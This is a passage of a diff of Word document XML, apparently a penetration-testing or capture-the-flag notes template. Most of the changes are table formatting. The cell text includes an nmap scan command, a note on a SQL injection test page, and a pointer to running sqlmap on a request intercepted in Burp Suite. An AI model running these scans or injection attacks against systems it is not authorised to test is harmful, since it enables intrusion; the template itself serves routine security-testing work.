+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:widowControl w:val="0"/>
+              <w:spacing w:after="160"/>
               <w:rPr>
                 <w:kern w:val="0"/>
                 <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
@@ -1753,15 +1595,11 @@
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="2290" w:type="dxa"/>
-            <w:tcBorders/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Normal"/>
-              <w:widowControl w:val="false"/>
-              <w:bidi w:val="0"/>
-              <w:spacing w:before="0" w:after="160"/>
-              <w:jc w:val="left"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:widowControl w:val="0"/>
+              <w:spacing w:after="160"/>
               <w:rPr>
                 <w:kern w:val="0"/>
                 <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
@@ -1779,16 +1617,12 @@
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="2290" w:type="dxa"/>
-            <w:tcBorders/>
-            <w:shd w:color="auto" w:fill="EEECE1" w:themeFill="background2" w:val="clear"/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Normal"/>
-              <w:widowControl w:val="false"/>
-              <w:bidi w:val="0"/>
-              <w:spacing w:before="0" w:after="160"/>
-              <w:jc w:val="left"/>
+            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:widowControl w:val="0"/>
+              <w:spacing w:after="160"/>
               <w:rPr>
                 <w:kern w:val="0"/>
                 <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
@@ -1807,15 +1641,11 @@
           <w:tcPr>
             <w:tcW w:w="3042" w:type="dxa"/>
             <w:gridSpan w:val="2"/>
-            <w:tcBorders/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Normal"/>
-              <w:widowControl w:val="false"/>
-              <w:bidi w:val="0"/>
-              <w:spacing w:before="0" w:after="160"/>
-              <w:jc w:val="left"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:widowControl w:val="0"/>
+              <w:spacing w:after="160"/>
               <w:rPr>
                 <w:kern w:val="0"/>
                 <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
@@ -1833,22 +1663,18 @@
       </w:tr>
       <w:tr>
         <w:trPr>
-          <w:trHeight w:val="411" w:hRule="atLeast"/>
+          <w:trHeight w:val="411"/>
         </w:trPr>
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="2022" w:type="dxa"/>
             <w:gridSpan w:val="2"/>
-            <w:tcBorders/>
-            <w:shd w:color="auto" w:fill="EEECE1" w:themeFill="background2" w:val="clear"/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Normal"/>
-              <w:widowControl w:val="false"/>
-              <w:bidi w:val="0"/>
-              <w:spacing w:before="0" w:after="160"/>
-              <w:jc w:val="left"/>
+            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:widowControl w:val="0"/>
+              <w:spacing w:after="160"/>
               <w:rPr>
                 <w:kern w:val="0"/>
                 <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
@@ -1866,15 +1692,11 @@
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="2290" w:type="dxa"/>
-            <w:tcBorders/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Normal"/>
-              <w:widowControl w:val="false"/>
-              <w:bidi w:val="0"/>
-              <w:spacing w:before="0" w:after="160"/>
-              <w:jc w:val="left"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:widowControl w:val="0"/>
+              <w:spacing w:after="160"/>
               <w:rPr>
                 <w:kern w:val="0"/>
                 <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
@@ -1892,16 +1714,12 @@
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="2290" w:type="dxa"/>
-            <w:tcBorders/>
-            <w:shd w:color="auto" w:fill="EEECE1" w:themeFill="background2" w:val="clear"/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Normal"/>
-              <w:widowControl w:val="false"/>
-              <w:bidi w:val="0"/>
-              <w:spacing w:before="0" w:after="160"/>
-              <w:jc w:val="left"/>
+            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:widowControl w:val="0"/>
+              <w:spacing w:after="160"/>
               <w:rPr>
                 <w:kern w:val="0"/>
                 <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
@@ -1920,47 +1738,48 @@
           <w:tcPr>
             <w:tcW w:w="3042" w:type="dxa"/>
             <w:gridSpan w:val="2"/>
-            <w:tcBorders/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Normal"/>
-              <w:widowControl w:val="false"/>
-              <w:bidi w:val="0"/>
-              <w:spacing w:before="0" w:after="160"/>
-              <w:jc w:val="left"/>
-              <w:rPr>
-                <w:kern w:val="0"/>
-                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:kern w:val="0"/>
-                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
-              </w:rPr>
-              <w:t>Nmap, SQLi, Web, Gobuster</w:t>
-            </w:r>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:widowControl w:val="0"/>
+              <w:spacing w:after="160"/>
+              <w:rPr>
+                <w:kern w:val="0"/>
+                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:kern w:val="0"/>
+                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+              </w:rPr>
+              <w:t xml:space="preserve">Nmap, SQLi, Web, </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:kern w:val="0"/>
+                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+              </w:rPr>
+              <w:t>Gobuster</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
           </w:p>
         </w:tc>
       </w:tr>
       <w:tr>
         <w:trPr>
-          <w:trHeight w:val="1834" w:hRule="atLeast"/>
+          <w:trHeight w:val="1834"/>
         </w:trPr>
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="1523" w:type="dxa"/>
-            <w:tcBorders/>
-            <w:shd w:color="auto" w:fill="EEECE1" w:themeFill="background2" w:val="clear"/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Normal"/>
-              <w:widowControl w:val="false"/>
-              <w:bidi w:val="0"/>
-              <w:spacing w:before="0" w:after="160"/>
-              <w:jc w:val="left"/>
+            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:widowControl w:val="0"/>
+              <w:spacing w:after="160"/>
               <w:rPr>
                 <w:kern w:val="0"/>
                 <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
@@ -1976,11 +1795,8 @@
           </w:p>
           <w:p>
             <w:pPr>
-              <w:pStyle w:val="Normal"/>
-              <w:widowControl w:val="false"/>
-              <w:bidi w:val="0"/>
-              <w:spacing w:before="0" w:after="160"/>
-              <w:jc w:val="left"/>
+              <w:widowControl w:val="0"/>
+              <w:spacing w:after="160"/>
               <w:rPr>
                 <w:kern w:val="0"/>
                 <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
@@ -1999,15 +1815,11 @@
           <w:tcPr>
             <w:tcW w:w="8121" w:type="dxa"/>
             <w:gridSpan w:val="5"/>
-            <w:tcBorders/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Normal"/>
-              <w:widowControl w:val="false"/>
-              <w:bidi w:val="0"/>
-              <w:spacing w:before="0" w:after="160"/>
-              <w:jc w:val="left"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:widowControl w:val="0"/>
+              <w:spacing w:after="160"/>
               <w:rPr>
                 <w:kern w:val="0"/>
                 <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
@@ -2025,22 +1837,18 @@
       </w:tr>
       <w:tr>
         <w:trPr>
-          <w:trHeight w:val="395" w:hRule="atLeast"/>
+          <w:trHeight w:val="395"/>
         </w:trPr>
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="2022" w:type="dxa"/>
             <w:gridSpan w:val="2"/>
-            <w:tcBorders/>
-            <w:shd w:color="auto" w:fill="EEECE1" w:themeFill="background2" w:val="clear"/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Normal"/>
-              <w:widowControl w:val="false"/>
-              <w:bidi w:val="0"/>
-              <w:spacing w:before="0" w:after="160"/>
-              <w:jc w:val="left"/>
+            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:widowControl w:val="0"/>
+              <w:spacing w:after="160"/>
               <w:rPr>
                 <w:kern w:val="0"/>
                 <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
@@ -2059,16 +1867,12 @@
           <w:tcPr>
             <w:tcW w:w="6342" w:type="dxa"/>
             <w:gridSpan w:val="3"/>
-            <w:tcBorders/>
-            <w:shd w:color="auto" w:fill="EEECE1" w:themeFill="background2" w:val="clear"/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Normal"/>
-              <w:widowControl w:val="false"/>
-              <w:bidi w:val="0"/>
-              <w:spacing w:before="0" w:after="160"/>
-              <w:jc w:val="left"/>
+            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:widowControl w:val="0"/>
+              <w:spacing w:after="160"/>
               <w:rPr>
                 <w:kern w:val="0"/>
                 <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
@@ -2086,16 +1890,12 @@
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="1280" w:type="dxa"/>
-            <w:tcBorders/>
-            <w:shd w:color="auto" w:fill="EEECE1" w:themeFill="background2" w:val="clear"/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Normal"/>
-              <w:widowControl w:val="false"/>
-              <w:bidi w:val="0"/>
-              <w:spacing w:before="0" w:after="160"/>
-              <w:jc w:val="left"/>
+            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:widowControl w:val="0"/>
+              <w:spacing w:after="160"/>
               <w:rPr>
                 <w:kern w:val="0"/>
                 <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
@@ -2113,21 +1913,17 @@
       </w:tr>
       <w:tr>
         <w:trPr>
-          <w:trHeight w:val="1735" w:hRule="atLeast"/>
+          <w:trHeight w:val="1735"/>
         </w:trPr>
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="2022" w:type="dxa"/>
             <w:gridSpan w:val="2"/>
-            <w:tcBorders/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Normal"/>
-              <w:widowControl w:val="false"/>
-              <w:bidi w:val="0"/>
-              <w:spacing w:before="0" w:after="160"/>
-              <w:jc w:val="left"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:widowControl w:val="0"/>
+              <w:spacing w:after="160"/>
               <w:rPr>
                 <w:kern w:val="0"/>
                 <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
@@ -2146,15 +1942,11 @@
           <w:tcPr>
             <w:tcW w:w="6342" w:type="dxa"/>
             <w:gridSpan w:val="3"/>
-            <w:tcBorders/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Normal"/>
-              <w:widowControl w:val="false"/>
-              <w:bidi w:val="0"/>
-              <w:spacing w:before="0" w:after="160"/>
-              <w:jc w:val="left"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:widowControl w:val="0"/>
+              <w:spacing w:after="160"/>
               <w:rPr>
                 <w:kern w:val="0"/>
                 <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
@@ -2170,69 +1962,128 @@
           </w:p>
           <w:p>
             <w:pPr>
-              <w:pStyle w:val="Normal"/>
-              <w:widowControl w:val="false"/>
-              <w:bidi w:val="0"/>
-              <w:spacing w:before="0" w:after="160"/>
-              <w:jc w:val="left"/>
-              <w:rPr>
-                <w:kern w:val="0"/>
-                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:kern w:val="0"/>
-                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
-              </w:rPr>
-              <w:t>nmap -sC -sV -oN init.scan $IP</w:t>
+              <w:widowControl w:val="0"/>
+              <w:spacing w:after="160"/>
+              <w:rPr>
+                <w:kern w:val="0"/>
+                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+              </w:rPr>
+            </w:pPr>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:kern w:val="0"/>
+                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+              </w:rPr>
+              <w:t>nmap</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:kern w:val="0"/>
+                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> -</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:kern w:val="0"/>
+                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+              </w:rPr>
+              <w:t>sC</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:kern w:val="0"/>
+                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> -</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:kern w:val="0"/>
+                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+              </w:rPr>
+              <w:t>sV</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:kern w:val="0"/>
+                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> -</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:kern w:val="0"/>
+                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+              </w:rPr>
+              <w:t>oN</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:kern w:val="0"/>
+                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:proofErr w:type="gramStart"/>
+            <w:r>
+              <w:rPr>
+                <w:kern w:val="0"/>
+                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+              </w:rPr>
+              <w:t>init.scan</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:proofErr w:type="gramEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:kern w:val="0"/>
+                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> $IP</w:t>
             </w:r>
           </w:p>
         </w:tc>
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="1280" w:type="dxa"/>
-            <w:tcBorders/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Normal"/>
-              <w:widowControl w:val="false"/>
-              <w:bidi w:val="0"/>
-              <w:spacing w:before="0" w:after="160"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:widowControl w:val="0"/>
+              <w:spacing w:after="160"/>
               <w:jc w:val="center"/>
               <w:rPr>
                 <w:sz w:val="48"/>
                 <w:szCs w:val="48"/>
               </w:rPr>
             </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:sz w:val="48"/>
-                <w:szCs w:val="48"/>
-              </w:rPr>
-            </w:r>
           </w:p>
         </w:tc>
       </w:tr>
       <w:tr>
         <w:trPr>
-          <w:trHeight w:val="395" w:hRule="atLeast"/>
+          <w:trHeight w:val="395"/>
         </w:trPr>
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="2022" w:type="dxa"/>
             <w:gridSpan w:val="2"/>
-            <w:tcBorders/>
-            <w:shd w:color="auto" w:fill="EEECE1" w:themeFill="background2" w:val="clear"/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Normal"/>
-              <w:widowControl w:val="false"/>
-              <w:bidi w:val="0"/>
-              <w:spacing w:before="0" w:after="160"/>
-              <w:jc w:val="left"/>
+            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:widowControl w:val="0"/>
+              <w:spacing w:after="160"/>
               <w:rPr>
                 <w:kern w:val="0"/>
                 <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
@@ -2251,16 +2102,12 @@
           <w:tcPr>
             <w:tcW w:w="6342" w:type="dxa"/>
             <w:gridSpan w:val="3"/>
-            <w:tcBorders/>
-            <w:shd w:color="auto" w:fill="EEECE1" w:themeFill="background2" w:val="clear"/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Normal"/>
-              <w:widowControl w:val="false"/>
-              <w:bidi w:val="0"/>
-              <w:spacing w:before="0" w:after="160"/>
-              <w:jc w:val="left"/>
+            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:widowControl w:val="0"/>
+              <w:spacing w:after="160"/>
               <w:rPr>
                 <w:kern w:val="0"/>
                 <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
@@ -2278,16 +2125,12 @@
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="1280" w:type="dxa"/>
-            <w:tcBorders/>
-            <w:shd w:color="auto" w:fill="EEECE1" w:themeFill="background2" w:val="clear"/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Normal"/>
-              <w:widowControl w:val="false"/>
-              <w:bidi w:val="0"/>
-              <w:spacing w:before="0" w:after="160"/>
-              <w:jc w:val="left"/>
+            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:widowControl w:val="0"/>
+              <w:spacing w:after="160"/>
               <w:rPr>
                 <w:kern w:val="0"/>
                 <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
@@ -2305,21 +2148,17 @@
       </w:tr>
       <w:tr>
         <w:trPr>
-          <w:trHeight w:val="1837" w:hRule="atLeast"/>
+          <w:trHeight w:val="1837"/>
         </w:trPr>
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="2022" w:type="dxa"/>
             <w:gridSpan w:val="2"/>
-            <w:tcBorders/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Normal"/>
-              <w:widowControl w:val="false"/>
-              <w:bidi w:val="0"/>
-              <w:spacing w:before="0" w:after="160"/>
-              <w:jc w:val="left"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:widowControl w:val="0"/>
+              <w:spacing w:after="160"/>
               <w:rPr>
                 <w:kern w:val="0"/>
                 <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
@@ -2338,24 +2177,18 @@
           <w:tcPr>
             <w:tcW w:w="6342" w:type="dxa"/>
             <w:gridSpan w:val="3"/>
-            <w:tcBorders/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Normal"/>
-              <w:widowControl w:val="false"/>
-              <w:bidi w:val="0"/>
-              <w:spacing w:before="0" w:after="160"/>
-              <w:jc w:val="left"/>
-              <w:rPr>
-                <w:kern w:val="0"/>
-                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:i w:val="false"/>
-                <w:iCs w:val="false"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:widowControl w:val="0"/>
+              <w:spacing w:after="160"/>
+              <w:rPr>
+                <w:kern w:val="0"/>
+                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
                 <w:kern w:val="0"/>
                 <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
               </w:rPr>
@@ -2366,47 +2199,34 @@
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="1280" w:type="dxa"/>
-            <w:tcBorders/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Normal"/>
-              <w:widowControl w:val="false"/>
-              <w:bidi w:val="0"/>
-              <w:spacing w:before="0" w:after="160"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:widowControl w:val="0"/>
+              <w:spacing w:after="160"/>
               <w:jc w:val="center"/>
               <w:rPr>
                 <w:sz w:val="48"/>
                 <w:szCs w:val="48"/>
               </w:rPr>
             </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:sz w:val="48"/>
-                <w:szCs w:val="48"/>
-              </w:rPr>
-            </w:r>
           </w:p>
         </w:tc>
       </w:tr>
       <w:tr>
         <w:trPr>
-          <w:trHeight w:val="395" w:hRule="atLeast"/>
+          <w:trHeight w:val="395"/>
         </w:trPr>
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="2022" w:type="dxa"/>
             <w:gridSpan w:val="2"/>
-            <w:tcBorders/>
-            <w:shd w:color="auto" w:fill="EEECE1" w:themeFill="background2" w:val="clear"/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Normal"/>
-              <w:widowControl w:val="false"/>
-              <w:bidi w:val="0"/>
-              <w:spacing w:before="0" w:after="160"/>
-              <w:jc w:val="left"/>
+            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:widowControl w:val="0"/>
+              <w:spacing w:after="160"/>
               <w:rPr>
                 <w:kern w:val="0"/>
                 <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
@@ -2425,16 +2245,12 @@
           <w:tcPr>
             <w:tcW w:w="6342" w:type="dxa"/>
             <w:gridSpan w:val="3"/>
-            <w:tcBorders/>
-            <w:shd w:color="auto" w:fill="EEECE1" w:themeFill="background2" w:val="clear"/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Normal"/>
-              <w:widowControl w:val="false"/>
-              <w:bidi w:val="0"/>
-              <w:spacing w:before="0" w:after="160"/>
-              <w:jc w:val="left"/>
+            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:widowControl w:val="0"/>
+              <w:spacing w:after="160"/>
               <w:rPr>
                 <w:kern w:val="0"/>
                 <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
@@ -2452,16 +2268,12 @@
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="1280" w:type="dxa"/>
-            <w:tcBorders/>
-            <w:shd w:color="auto" w:fill="EEECE1" w:themeFill="background2" w:val="clear"/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Normal"/>
-              <w:widowControl w:val="false"/>
-              <w:bidi w:val="0"/>
-              <w:spacing w:before="0" w:after="160"/>
-              <w:jc w:val="left"/>
+            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:widowControl w:val="0"/>
+              <w:spacing w:after="160"/>
               <w:rPr>
                 <w:kern w:val="0"/>
                 <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
@@ -2479,32 +2291,37 @@
       </w:tr>
       <w:tr>
         <w:trPr>
-          <w:trHeight w:val="1716" w:hRule="atLeast"/>
+          <w:trHeight w:val="1716"/>
         </w:trPr>
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="2022" w:type="dxa"/>
             <w:gridSpan w:val="2"/>
-            <w:tcBorders/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Normal"/>
-              <w:widowControl w:val="false"/>
-              <w:bidi w:val="0"/>
-              <w:spacing w:before="0" w:after="160"/>
-              <w:jc w:val="left"/>
-              <w:rPr>
-                <w:kern w:val="0"/>
-                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:kern w:val="0"/>
-                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
-              </w:rPr>
-              <w:t>Test  page for SQLi</w:t>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:widowControl w:val="0"/>
+              <w:spacing w:after="160"/>
+              <w:rPr>
+                <w:kern w:val="0"/>
+                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+              </w:rPr>
+            </w:pPr>
+            <w:proofErr w:type="gramStart"/>
+            <w:r>
+              <w:rPr>
+                <w:kern w:val="0"/>
+                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+              </w:rPr>
+              <w:t>Test  page</w:t>
+            </w:r>
+            <w:proofErr w:type="gramEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:kern w:val="0"/>
+                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> for SQLi</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -2512,93 +2329,118 @@
           <w:tcPr>
             <w:tcW w:w="6342" w:type="dxa"/>
             <w:gridSpan w:val="3"/>
-            <w:tcBorders/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Normal"/>
-              <w:widowControl w:val="false"/>
-              <w:bidi w:val="0"/>
-              <w:spacing w:before="0" w:after="160"/>
-              <w:jc w:val="left"/>
-              <w:rPr>
-                <w:kern w:val="0"/>
-                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:kern w:val="0"/>
-                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
-              </w:rPr>
-              <w:t>Manually exploit or use SQLmap with an intercepted request saved as a file from burpsuite</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Normal"/>
-              <w:widowControl w:val="false"/>
-              <w:bidi w:val="0"/>
-              <w:spacing w:before="0" w:after="160"/>
-              <w:jc w:val="left"/>
-              <w:rPr>
-                <w:kern w:val="0"/>
-                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:kern w:val="0"/>
-                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
-              </w:rPr>
-              <w:t>sqlmap -r request.file</w:t>
-            </w:r>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:widowControl w:val="0"/>
+              <w:spacing w:after="160"/>
+              <w:rPr>
+                <w:kern w:val="0"/>
+                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:kern w:val="0"/>
+                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+              </w:rPr>
+              <w:t xml:space="preserve">Manually exploit or use </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:kern w:val="0"/>
+                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+              </w:rPr>
